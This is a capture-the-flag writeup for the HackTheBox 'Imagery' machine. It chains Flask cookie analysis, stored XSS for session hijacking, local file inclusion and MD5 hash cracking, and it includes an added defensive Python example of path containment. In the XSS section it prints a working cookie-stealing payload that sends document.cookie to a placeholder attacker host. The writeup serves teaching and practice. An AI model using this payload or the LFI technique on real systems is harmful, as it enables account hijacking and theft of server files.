Imagery: HackTheBox Medium Box Writeup

Overview

Imagery is a Medium-rated Linux machine on HackTheBox that chains together several classic web vulnerabilities in a cool sequence: session token analysis, Cross-Site Scripting (XSS) for session hijacking, and Local File Inclusion (LFI) to pull sensitive files from the server. It's a great box for practising client-side attack techniques and understanding how chained vulnerabilities can escalate from a low-privilege user to full admin access.


Enumeration

An Nmap scan reveals two open ports: SSH (22) and an HTTP service on the non-standard port 8000, running Werkzeug 3.1.3 / Python 3.12.7 — a Python web framework commonly used with Flask. The site is an Image Gallery application that allows user registration and image uploads.

After registering an account and poking around, the application appears fairly sparse. However, diving into browser DevTools reveals something interesting: every navigation action triggers an auth_status request carrying a session token.


Session Token Analysis

The token format isn't a JWT; it's a Flask session cookie, identifiable by its characteristic dot-separated structure. The natural next step is attempting to crack the signing secret using flask-unsign against a wordlist. In this case the crack doesn't succeed, but the investigation reveals something arguably more useful: the cookie's HTTPOnly flag is set to False.

This means JavaScript running on the page can read the session cookie, which is the precondition for a cookie-stealing XSS attack.


XSS — Session Hijacking

Digging through the application's JavaScript source in the DevTools Debugger exposes the full client-side codebase. A bug report submission field accepts user input that is never sanitised before being rendered. This is an example of a stored XSS vulnerability.

Injecting a payload into the bug report field that makes an outbound fetch request to an attacker-controlled HTTP server, with document.cookie appended as a query parameter, successfully exfiltrates the admin's session cookie when an admin reviews the report.

<img src=x onerror="fetch('http://<attacker_ip>:13337?p='+document.cookie)">

With the admin session cookie in hand, replacing your own cookie in the browser grants full administrative access to the application.


Local File Inclusion — Reading Server Files

With admin access, the admin panel includes a log file viewer. Watching the network requests in DevTools while using this feature reveals that it fetches files by passing a filename parameter directly to the server. More importantly, there is no apparent path restriction on that parameter.

Modifying the filename parameter to point at arbitrary server paths enables Local File Inclusion. Since the application is Flask/Python, the main application file is almost certainly app.py. Fetching it returns the full source code, which contains a hardcoded user store with MD5-hashed passwords and admin credentials.
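The root cause of the LFI is a filename parameter joined to a directory with no containment check. The following added example (not code from the box or its author; LOG_DIR and the file names are constructed assumptions, and no Flask is needed to run it) shows the unrestricted lookup the writeup describes beside a hardened version that resolves the path and refuses anything outside the log directory.

```python
import os
import tempfile
from typing import Optional

# Constructed sample log directory with one legitimate log file.
# Assumption: stands in for whatever directory the real log viewer reads from.
LOG_DIR = tempfile.mkdtemp(prefix="imagery_logs_")
with open(os.path.join(LOG_DIR, "app.log"), "w") as f:
    f.write("INFO application started\n")


def vulnerable_log_path(filename: str) -> str:
    """Unrestricted lookup, as the writeup describes the admin log viewer.

    os.path.join drops LOG_DIR entirely when filename is absolute, and
    '..' segments are passed straight through, so any readable file on the
    server can be requested.
    """
    return os.path.join(LOG_DIR, filename)


def safe_log_path(filename: str) -> Optional[str]:
    """Hardened lookup: the resolved path must stay inside LOG_DIR.

    realpath() collapses '..' and follows symlinks before the check, so a
    link planted inside the directory cannot be used to escape it either.
    Returns None for anything that is not a regular file within LOG_DIR.
    """
    base = os.path.realpath(LOG_DIR)
    candidate = os.path.realpath(os.path.join(base, filename))
    # commonpath() is a prefix check on path components, not on characters,
    # so a sibling directory like LOG_DIR + "_evil" is correctly rejected.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def read_log(filename: str) -> Optional[str]:
    """Serve a log file only when the hardened lookup accepts the name."""
    path = safe_log_path(filename)
    if path is None:
        return None
    with open(path, "r") as fh:
        return fh.read()
```

Pairing this check with a fixed allow-list of log names is stricter still; the containment test is the minimum that turns the viewer's file read from arbitrary to scoped.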

With those hashes cracked (MD5 hashes of weak passwords fall quickly to tools like hashcat or online lookup tables), the path to SSH access as a privileged user, and ultimately to the flags, is open.